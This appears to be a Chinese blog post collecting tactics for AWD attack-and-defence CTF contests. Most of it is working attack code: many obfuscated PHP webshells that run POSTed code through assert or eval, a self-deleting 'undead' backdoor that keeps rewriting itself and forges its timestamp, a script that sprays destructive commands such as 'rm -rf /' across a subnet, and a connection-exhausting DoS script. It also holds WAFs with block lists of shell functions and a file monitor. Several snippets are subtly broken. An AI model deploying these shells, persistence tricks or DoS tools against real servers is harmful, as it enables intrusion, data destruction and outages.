AWD姿势总结

1.准备一个webshell脚本: 带密码的webshell，注释变形，字符串变形，自增变形，利用文件名，利用.htaccess

1	`<?php @assert($_POST['pass']); ?>`

<?php
	$a="assert";
	@$a($_POST['pass']);
?>

<?php  
$a = "a"."s"."s"."e"."r"."t"; 
$a($_POST[pass]);
?>

<?php
	$a=substr_replace("assexx","rt",4);
	@$a($_POST['pass']);
?>

<?php
	$a="a"."s";
	$b="s"."e"."rt";
	$c=$a.$b;
	$c($_POST['cmd']);
?>

<?php
	$a=base_decode(YXNzZXJ0);
	$b=$a(base64_decode($_POST['pass']));
?>

<?php
	class shyshy{
		public $a='';
		function __destruct(){
			assert("this->$a");
			}
		}
		$b=new shyshy();
		$b->a=$_POST['pass'];
?>

<?php
	function shyshy($a){
	assert($a);
	}
	@shyshy($_POST['pass']);
?>

<?php
	$a=$_REQUEST['pass'];
	$b="\n";
	eval($b.=$a);
?>

<?php
	if(isset($_POST['filename']))
	{
		$d='data';
		$$d=$_POST['text'];  //$data
		$f='fp';
		$$f=fopen($_POST['filename'],'wb');  //$fp
		echo fwrite($fp,$data):"save success":"save fail";
		fclose($fp);
	}
?>

2.waf准备：拦截恶意payload，恶意字符串，flag输出一个假flag，记录日志

只记录流量，无过滤功能
<?php
error_reporting(0);
define('LOG_FILENAME', 'log.txt');	
function waf() {
    if (!function_exists('getallheaders')) {
        function getallheaders() {
            foreach ($_SERVER as $name => $value) {
                if (substr($name, 0, 5) == 'HTTP_') $headers[str_replace(' ', '-', ucwords(strtolower(str_replace('_', ' ', substr($name, 5))))) ] = $value;
            }
            return $headers;
        }
    }
    $get = $_GET;
    $post = $_POST;
    $cookie = $_COOKIE;
    $header = getallheaders();
    $files = $_FILES;
    $ip = $_SERVER["REMOTE_ADDR"];
    $method = $_SERVER['REQUEST_METHOD'];
    $filepath = $_SERVER["SCRIPT_NAME"];
    //rewirte shell which uploaded by others, you can do more
    foreach ($_FILES as $key => $value) {
        $files[$key]['content'] = file_get_contents($_FILES[$key]['tmp_name']);
        file_put_contents($_FILES[$key]['tmp_name'], "virink");
    }
    unset($header['Accept']); //fix a bug
    $input = array(
        "Get" => $get,
        "Post" => $post,
        "Cookie" => $cookie,
        "File" => $files,
        "Header" => $header
    );
    //deal with
    $pattern = "select|insert|update|delete|and|or|\'|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile|dumpfile|sub|hex";
    $pattern.= "|file_put_contents|fwrite|curl|system|eval|assert";
    $pattern.= "|passthru|exec|system|chroot|scandir|chgrp|chown|shell_exec|proc_open|proc_get_status|popen|ini_alter|ini_restore";
    $pattern.= "|`|dl|openlog|syslog|readlink|symlink|popepassthru|stream_socket_server|assert|pcntl_exec";
    $vpattern = explode("|", $pattern);
    $bool = false;
    foreach ($input as $k => $v) {
        foreach ($vpattern as $value) {
            foreach ($v as $kk => $vv) {
                if (preg_match("/$value/i", $vv)) {
                    $bool = true;
                    logging($input);
                    break;
                }
            }
            if ($bool) break;
        }
        if ($bool) break;
    }
}
function logging($var) {
	date_default_timezone_set("Asia/Shanghai");//修正时间为中国准确时间
	$time=date("Y-m-d H:i:s");//将时间赋值给变量$time
    file_put_contents(LOG_FILENAME, "\r\n\r\n\r\n" . $time . "\r\n" . print_r($var, true) , FILE_APPEND);
    // die() or unset($_GET) or unset($_POST) or unset($_COOKIE);
    
}
waf();
?>

记录并过滤非法请求字符，若检测到请求字段中含有flag，则会显示假flag。
<?php
date_default_timezone_set("PRC");
//这块在开始的代码没有的，我加的。不加就会报错。
//error_reporting(E_ALL);
//ini_set('display_errors', 1);

/*
** 线下攻防php版本waf
**
** Author: Y
*/

/*
检测请求方式，除了get和post之外拦截下来并写日志。
*/
if($_SERVER['REQUEST_METHOD'] != 'POST' && $_SERVER['REQUEST_METHOD'] != 'GET'){
	write_attack_log("method");
}

$url = $_SERVER['REQUEST_URI']; //获取url来进行检测

$data = file_get_contents('php://input'); //获取post的data，无论是否是mutipart

$headers = get_all_headers(); //获取header

filter_attack_keyword(filter_invisible(urldecode(filter_0x25($url)))); //对URL进行检测，出现问题则拦截并记录
filter_attack_keyword(filter_invisible(urldecode(filter_0x25($data)))); //对POST的内容进行检测，出现问题拦截并记录

/*
检测过了则对输入进行简单过滤
*/
foreach ($_GET as $key => $value) {
	$_GET[$key] = filter_dangerous_words($value);
}
foreach ($_POST as $key => $value) {
	$_POST[$key] = filter_dangerous_words($value);
}
foreach ($headers as $key => $value) {
	filter_attack_keyword(filter_invisible(urldecode(filter_0x25($value)))); //对http请求头进行检测，出现问题拦截并记录
	$_SERVER[$key] = filter_dangerous_words($value); //简单过滤
}

/*
获取http请求头并写入数组
*/
function get_all_headers() { 
	$headers = array(); 
 
	foreach($_SERVER as $key => $value) { 
		if(substr($key, 0, 5) === 'HTTP_') { 
			$headers[$key] = $value; 
		} 
	} 
 
	return $headers; 
} 


/*
检测不可见字符造成的截断和绕过效果，注意网站请求带中文需要简单修改
*/
function filter_invisible($str){
	for($i=0;$i<strlen($str);$i++){
		$ascii = ord($str[$i]);
		if($ascii>126 || $ascii < 32){ //有中文这里要修改
			if(!in_array($ascii, array(9,10,13))){
				write_attack_log("interrupt");
			}else{
				$str = str_replace($ascii, " ", $str);
			}
		}
	}
	$str = str_replace(array("`","|",";",","), " ", $str);
	return $str;
}

/*
检测网站程序存在二次编码绕过漏洞造成的%25绕过，此处是循环将%25替换成%，直至不存在%25
*/
function filter_0x25($str){
	if(strpos($str,"%25") !== false){
		$str = str_replace("%25", "%", $str);
		return filter_0x25($str);
	}else{
		return $str;
	}
}

/*
攻击关键字检测，此处由于之前将特殊字符替换成空格，即使存在绕过特性也绕不过正则的\b
*/
function filter_attack_keyword($str){
	if(preg_match("/select\b|insert\b|update\b|drop\b|delete\b|dumpfile\b|outfile\b|load_file|rename\b|floor\(|extractvalue|updatexml|name_const|multipoint\(/i", $str)){
		write_attack_log("sqli");
	}

	//此处文件包含的检测我真的不会写了，求高人指点。。。
	if(substr_count($str,$_SERVER['PHP_SELF']) < 2){
		$tmp = str_replace($_SERVER['PHP_SELF'], "", $str);
		if(preg_match("/\.\.|.*\.php[35]{0,1}/i", $tmp)){ 
			write_attack_log("LFI/LFR");;
		}
	}else{
		write_attack_log("LFI/LFR");
	}
	if(preg_match("/base64_decode|eval\(|assert\(/i", $str)){
		write_attack_log("EXEC");
	}
	if(preg_match("/flag/i", $str)){
		write_attack_log("GETFLAG");
	}

}

/*
简单将易出现问题的字符替换成中文
*/
function filter_dangerous_words($str){
	$str = str_replace("'", "‘", $str);
	$str = str_replace("\"", "“", $str);
	$str = str_replace("<", "《", $str);
	$str = str_replace(">", "》", $str);
	return $str;
}

/*
获取http的请求包，意义在于获取别人的攻击payload
*/
function get_http_raw() { 
	$raw = ''; 

	$raw .= $_SERVER['REQUEST_METHOD'].' '.$_SERVER['REQUEST_URI'].' '.$_SERVER['SERVER_PROTOCOL']."\r\n"; 
	 
	foreach($_SERVER as $key => $value) { 
		if(substr($key, 0, 5) === 'HTTP_') { 
			$key = substr($key, 5); 
			$key = str_replace('_', '-', $key); 
			$raw .= $key.': '.$value."\r\n"; 
		} 
	} 
	$raw .= "\r\n"; 
	$raw .= file_get_contents('php://input'); 
	return $raw; 
}

/*
这里拦截并记录攻击payload
*/
function write_attack_log($alert){
	$data = date("Y/m/d H:i:s")." -- [".$alert."]"."\r\n".get_http_raw()."\r\n\r\n";
	$ffff = fopen('log_is_a_secret_file.txt', 'a'); //日志路径 
	fwrite($ffff, $data);  
	fclose($ffff);
	if($alert == 'GETFLAG'){
		echo "flag{f1989134-db6e-4769-ac1b-9d6ebf9ef46d}"; //如果请求带有flag关键字，显示假的flag。（2333333）
	}else{
		sleep(15); //拦截前延时15秒
	}
	exit(0);
}

?>

waf plus版本能过滤非法请求字符，非法函数，记录流量，显示假flag等。
建议使用waf_plus进行通防。
<?php
header('Content-Type: text/html; charset=utf-8');
error_reporting(0);

define('LOG_FILENAME', 'Attack_Big_information.txt');	
function waf() {
    if (!function_exists('getallheaders')) {
        function getallheaders() {
            foreach ($_SERVER as $name => $value) {
                if (substr($name, 0, 5) == 'HTTP_') $headers[str_replace(' ', '-', ucwords(strtolower(str_replace('_', ' ', substr($name, 5))))) ] = $value;
            }
            return $headers;
        }
    }
    $get = $_GET;
    $post = $_POST;
    $cookie = $_COOKIE;
    $header = getallheaders();
    $files = $_FILES;
    $ip = $_SERVER["REMOTE_ADDR"];
    $method = $_SERVER['REQUEST_METHOD'];
    $filepath = $_SERVER["SCRIPT_NAME"];
    foreach ($_FILES as $key => $value) {
        $files[$key]['content'] = file_get_contents($_FILES[$key]['tmp_name']);
        file_put_contents($_FILES[$key]['tmp_name'], "virink");
    }
    unset($header['Accept']); //fix a bug
    $input = array(
        "Get" => $get,
        "Post" => $post,
        "Cookie" => $cookie,
        "File" => $files,
        "Header" => $header
    );
    $pattern = "select|insert|update|delete|and|or|\'|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile|dumpfile|sub|hex";
    $pattern.= "|file_put_contents|fwrite|curl|system|eval|assert";
    $pattern.= "|passthru|exec|system|chroot|scandir|chgrp|chown|shell_exec|proc_open|proc_get_status|popen|ini_alter|ini_restore";
    $pattern.= "|`|dl|openlog|syslog|readlink|symlink|popepassthru|stream_socket_server|assert|pcntl_exec";
    $vpattern = explode("|", $pattern);
    $bool = false;
    foreach ($input as $k => $v) {
        foreach ($vpattern as $value) {
            foreach ($v as $kk => $vv) {
                if (preg_match("/$value/i", $vv)) {
                    $bool = true;
                    logging($input);
                    break;
                }
            }
            if ($bool) break;
        }
        if ($bool) break;
    }
}
function logging($var) {
	date_default_timezone_set("Asia/Shanghai");
	$time=date("Y-m-d H:i:s");
    file_put_contents(LOG_FILENAME, "\r\n\r\n\r\n" . $time . "\r\n" . print_r($var, true) , FILE_APPEND);
}
waf();


class waf{
	
	private $request_url;
	private $request_method;
	private $request_data;
	private $headers;
	private $raw;

	
// 自动部署构造方法
function __construct(){
	//echo "class waf construct execute..</br>";   //debug code
	$this->write_access_log_probably();  //记录访问纪录    类似于日志
	$this->write_access_logs_detailed();  //纪录详细访问请求包  
	//echo "class waf construct execute..2</br>";	
	if($_SERVER['REQUEST_METHOD'] != 'POST' && $_SERVER['REQUEST_METHOD'] != 'GET'){
    write_attack_log("method");
	}
	//echo "class waf construct execute..3</br>";
	$this->request_url= $_SERVER['REQUEST_URI']; //获取url来进行检测


	$this->request_data = file_get_contents('php://input'); //获取post

	$this->headers =$this->get_all_headers(); //获取header  

	//echo "class waf construct execute half..</br>";


	$this->filter_attack_keyword($this->filter_invisible(urldecode($this->filter_0x25($this->request_url)))); //对URL进行检测，出现问题则拦截并记录
	$this->filter_attack_keyword($this->filter_invisible(urldecode($this->filter_0x25($this->request_data)))); //对POST的内容进行检测，出现问题拦截并记录
	//echo "class waf construct execute..4</br>";
	$this->detect_upload();

	$this->gloabel_attack_detect();
	
	
	//echo "class waf construct execute  success..</br>";

}

//全局输入检测  基本的url和post检测过了则对所有输入进行简单过滤

function gloabel_attack_detect(){
	
	foreach ($_GET as $key => $value) {
		$_GET[$key] = $this->filter_dangerous_words($value);
	}
	foreach ($_POST as $key => $value) {
		$_POST[$key] = $this->filter_dangerous_words($value);
	}
	foreach ($headers as $key => $value) {
		$this->filter_attack_keyword($this->filter_invisible(urldecode(filter_0x25($value)))); //对http请求头进行检测，出现问题拦截并记录
		$_SERVER[$key] = $this->filter_dangerous_words($value); //简单过滤
	}
}


//拦截所有的文件上传  并记录上传操作  并将上传文件保存至系统tmp文件夹下
function detect_upload(){
	foreach ($_FILES as $key => $value) {
        if($_FILES[$key]['size']>1){
			echo "小伙子你不讲武德啊，你这上传的是啥?????你很危险啊！(╯‵□′)╯︵┻━┻";
			$this->write_attack_log("Upload");
			//move_uploaded_file($_FILES[$key]["tmp_name"],'/tmp/uoloadfiles/'.$_FILES[$key]["name"]);
			exit(0);
		}
    }
}
	
//记录每次大概访问记录，类似日志，以便在详细记录中查找
function write_access_log_probably() { 
    $raw = date("Y/m/d H:i:s").'    '; 
    $raw .= $_SERVER['REQUEST_METHOD'].'     '.$_SERVER['REQUEST_URI'].'     '.$_SERVER['REMOTE_ADDR'].'    '; 
    $raw .= 'POST: '.file_get_contents('php://input')."\r\n"; 
	$ffff = fopen('all_requests.txt', 'a'); //日志路径 
    fwrite($ffff, $raw);  
    fclose($ffff);
}

//记录详细的访问头记录，包括GET POST http头   以获取通防waf未检测到的攻击payload
function write_access_logs_detailed(){
    $data = date("Y/m/d H:i:s")." -- "."\r\n".$this->get_http_raws()."\r\n\r\n";
    $ffff = fopen('all_requests_detail.txt', 'a'); //日志路径 
    fwrite($ffff, urldecode($data));  
    fclose($ffff);
}	
	
/*
获取http请求头并写入数组
*/
function get_all_headers() { 
    $headers = array(); 
 
    foreach($_SERVER as $key => $value) { 
        if(substr($key, 0, 5) === 'HTTP_') { 
            $headers[$key] = $value; 
        } 
    } 
 
    return $headers; 
}
/*
检测不可见字符造成的截断和绕过效果，注意网站请求带中文需要简单修改
*/
function filter_invisible($str){
    for($i=0;$i<strlen($str);$i++){
        $ascii = ord($str[$i]);
        if($ascii>126 || $ascii < 32){ //有中文这里要修改
            if(!in_array($ascii, array(9,10,13))){
                write_attack_log("interrupt");
            }else{
                $str = str_replace($ascii, " ", $str);
            }
        }
    }
    $str = str_replace(array("`","|",";",","), " ", $str);
    return $str;
}

/*
检测网站程序存在二次编码绕过漏洞造成的%25绕过，此处是循环将%25替换成%，直至不存在%25
*/
function filter_0x25($str){
    if(strpos($str,"%25") !== false){
        $str = str_replace("%25", "%", $str);
        return filter_0x25($str);
    }else{
        return $str;
    }
} 	


/*
攻击关键字检测，此处由于之前将特殊字符替换成空格，即使存在绕过特性也绕不过正则的\b
*/
function filter_attack_keyword($str){
    if(preg_match("/select\b|insert\b|update\b|drop\b|and\b|delete\b|dumpfile\b|outfile\b|load_file|rename\b|floor\(|extractvalue|updatexml|name_const|multipoint\(/i", $str)){
        $this->write_attack_log("sqli");
    }

    //文件包含的检测
    if(substr_count($str,$_SERVER['PHP_SELF']) < 2){
        $tmp = str_replace($_SERVER['PHP_SELF'], "", $str);
        if(preg_match("/\.\.|.*\.php[35]{0,1}/i", $tmp)){ 
            $this->write_attack_log("LFI/LFR");;
        }
    }else{
        $this->write_attack_log("LFI/LFR");
    }
    if(preg_match("/base64_decode|eval\(|assert\(|file_put_contents|fwrite|curl|system|passthru|exec|system|chroot|scandir|chgrp|chown|shell_exec|proc_open|proc_get_status|popen|ini_alter|ini_restorei/i", $str)){
        $this->write_attack_log("EXEC");
    }
    if(preg_match("/flag/i", $str)){
        $this->write_attack_log("GETFLAG");
    }

}

/*
简单将易出现问题的字符替换成中文
*/
function filter_dangerous_words($str){
    $str = str_replace("'", "‘", $str);
    $str = str_replace("\"", "“", $str);
    $str = str_replace("<", "《", $str);
    $str = str_replace(">", "》", $str);
    return $str;
}

/*
获取http的请求包，意义在于获取别人的攻击payload
*/
function get_http_raws() { 
    $raw = ''; 

    $raw .= $_SERVER['REQUEST_METHOD'].' '.$_SERVER['REQUEST_URI'].' '.$_SERVER['SERVER_PROTOCOL']."\r\n"; 
     
    foreach($_SERVER as $key => $value) { 
        if(substr($key, 0, 5) === 'HTTP_') { 
            $key = substr($key, 5); 
            $key = str_replace('_', '-', $key); 
            $raw .= $key.': '.$value."\r\n"; 
        } 
    } 
    $raw .= "\r\n"; 
    $raw .= file_get_contents('php://input'); 
    return $raw; 
}

/*
这里拦截并记录攻击payload      第一个参数为记录类型   第二个参数是日志内容   使用时直接调用函数
*/
function write_attack_log($alert){
    $data = date("Y/m/d H:i:s")." -- [".$alert."]"."\r\n".$this->get_http_raws()."\r\n\r\n";
    $ffff = fopen('attack_detected_log.txt', 'a'); //日志路径 
    fwrite($ffff, $data);  
    fclose($ffff);
    if($alert == 'GETFLAG'){
        echo "flag{f1989134-db6e-4769-ac1b-9d6ebf9ef46d}"; //如果请求带有flag关键字，显示假的flag。（2333333）
    }else{
        sleep(3); //拦截前延时3秒
    }
    exit(0);
}

	
}
$waf = new waf();

?>

反waf
import requests
import time

def scan_attack():
    file={'shell.php','admin.php','web.php','login.php','index.php','footer.php','.a.php'}
    payload={'getflag','cat /flag','ls -al','rm -f','echo 1','echo 1 /proc/sys/net/ipv4/ip_forward','rm -rf / --no-preserve-root'}
    while(1):
        for i in range(1, 52):
            for ii in file:
                url='http://192.168.63.'+ str(i)+':8801/'+ii
                print(url)
                for iii in payload:
                    data={
                        'payload':iii
                    }
                    try:
                        requests.post(url,data=data)
                        print("正在搅屎:"+str(i)+'|'+ii+'|'+iii)
                        time.sleep(0.1)
                    except Exception as e:
                        time.sleep(0.1)
                        pass


if __name__ == '__main__':
    scan_attack()

3.后门扫描：d盾，seay

4.不死马和反不死马：

生成不死马
<?php
    ignore_user_abort(true);  //设置与客户机断开是否会终止脚本的执行，true则不会
    set_time_limit(0);  //如果为零说明永久执行直到程序结束
    unlink(__FILE__);  //删除文件本身,调用unlink()的时候，文件还是存在的，只是目录里找不到该文件了
    $file='./.index1.php';  //生成的木马文件名为 .index1.php
    $code='<?php
        //给木马设置密码，防止他人使用
        if(md5($_POST["pass"])=="29b8babad580b5607470f6e01e90e27a"){  //密码：nichousha
            @eval($_POST["cmd"]);
        }?>';
    while(1){
        file_put_contents($file,$code);
        system('touch -m -d "2022-05-28 9:10:12" .index1.php');  //设置文件的编辑时间
        usleep(5000);  //每隔usleep(5000)写入一个新文件
    }
?>

kill不死马
<?php 
    ignore_user_abort(true);
    set_time_limit(0);
    unlink(__FILE__);
    $file = '.index1.php';
    $code = 'hi springbird !';
    //pass=pass
    while (1){
        file_put_contents($file,$code);
        system('touch -m -d "2022-05-28 09:10:12" .index1.php');
    //    usleep(5000);
          usleep(1000);
    }
?>

5.全自动化设置

dos
import socket
import time
import threading

max=90000000
port=80                 #端口
host="192.168.92.154"   #IP
page="/index.php"

bag=("POST %s HTTP/1.1\r\n"
    "host: %s\r\n"
    "Content-Length: 1000000000\r\n"
    "Cookie: 1998\r\n"
    "\r\n" % (page,host))

socks = []

def connect():
    global socks
    for i in range(0,max):
        s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        try:
            s.connect((host,port))
            s.send(bag.encode("utf-8"))
            socks.append(s)
        except Exception as ex:
            time.sleep(1)

def send():
    global socks
    while True:
        for s in socks:
            try:
                print("攻击中....")
            except Exception as ex:
                socks.remove(s)
                s.close()
        time.sleep(0.1)

One = threading.Thread(target=connect,args=())
Two = threading.Thread(target=send,args=())
One.start()
Two.start()

文件监控
#!/usr/bin/python
#coding=utf-8
#Usage:python2 demo.py

#注意：要将此文件放在有读写权限的目录以及所有修改过的php必须在此目录或者该目录的子目录中。
#作用：读取被修改过的文件，然后将文件的地址加上内容全部存放在txt


import sys,subprocess,os
#查找最近10分钟被修改的文件
def scanfile():
	#command: find -name '*.php' -mmin -10
	command = "find -name \'*.php\' -mmin -10"
	su = subprocess.Popen(command,shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
	STDOUT,STDERR = su.communicate()
	list = STDOUT.split("\n")
	#print str(list)
	#将文件处理成list类型然后返回。
	return list

#读取文件：
def loadfile(addr):
	data = ""
	#如果文件不存在就跳出函数
	try :
		file = open(addr,'r')
		data = file.read()
	except : 
		return 0
	all_data = addr+"\n"+data+"\n\n"
	file1 = open("shell.txt",'a+')
	#避免重复写入
	try:
		shell_content = file1.read()
	except:
		shell_content = "null"
	#如果文件内容不为空再写入，避免写入空的。
	#print shell_content
	if data :
		if all_data not in shell_content:
			file1.write(all_data)
	file.close()
	file1.close()
	rm_cmd = "rm -rf "+addr
	su = subprocess.Popen(rm_cmd,shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
	su.communicate()
	print "loadfile over : "+addr

if __name__ == '__main__':
	while True:

		list = scanfile()
		if list :
			for i in range(len(list)):
				#如果list[i]为空就不读取了
				if list[i]:
					loadfile(str(list[i]))
		else : pass

.htaccess
<FilesMatch "\.(?i:php|php3|php4|php5)">
	Order  allow,deny
    Deny  from  all
</FilesMatch>

CTF AWD

#AWD

AWD姿势总结

https://theganlove.github.io/2024/09/28/AWD姿势总结/

作者

uert

发布于

2024年9月28日

许可协议

渗透基础上一篇

数学建模下一篇